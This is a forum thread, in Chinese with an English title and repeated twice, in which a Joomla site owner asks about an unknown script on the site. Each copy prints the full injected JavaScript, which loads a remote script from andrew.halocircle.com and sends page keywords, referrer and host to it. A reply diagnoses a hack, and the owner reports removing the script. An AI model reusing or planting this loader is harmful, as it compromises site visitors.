joomla 从未知服务器读取
joomla reading from unkown server
最近我注意到在加载我的网站之前,它开始从某个 andrew.halocircle.com 网站加载数据。我认为要么我的 joomla 被黑了,要么我下载了一些错误的扩展。问题是现在该怎么办。我应该全新安装 Joomla 还是有更简单的解决方案?非常感谢任何帮助。
这是我在页面源代码中找到的代码,我认为不应该存在。有人能告诉我代码在做什么吗?有害吗?
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://andrew.halocircle.com/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://andrew.halocircle.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
您的网站很可能被黑了。试试这个超级快速的清理说明:http://www.itoctopus.com/a-super-fast-way-to-clean-a-hacked-joomla-website
确保清理网站后,只允许 Apache 执行 "index.php" 文件。
希望对您有所帮助!
我现在已经设法解决了这个问题,方法是从托管的每个 index.php 页面(从所有 joomla 模板)手动删除有害脚本。
最近我注意到在加载我的网站之前,它开始从某个 andrew.halocircle.com 网站加载数据。我认为要么我的 joomla 被黑了,要么我下载了一些错误的扩展。问题是现在该怎么办。我应该全新安装 Joomla 还是有更简单的解决方案?非常感谢任何帮助。
这是我在页面源代码中找到的代码,我认为不应该存在。有人能告诉我代码在做什么吗?有害吗?
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://andrew.halocircle.com/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://andrew.halocircle.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
您的网站很可能被黑了。试试这个超级快速的清理说明:http://www.itoctopus.com/a-super-fast-way-to-clean-a-hacked-joomla-website
确保清理网站后,只允许 Apache 执行 "index.php" 文件。
希望对您有所帮助!
我现在已经设法解决了这个问题,方法是从托管的每个 index.php 页面(从所有 joomla 模板)手动删除有害脚本。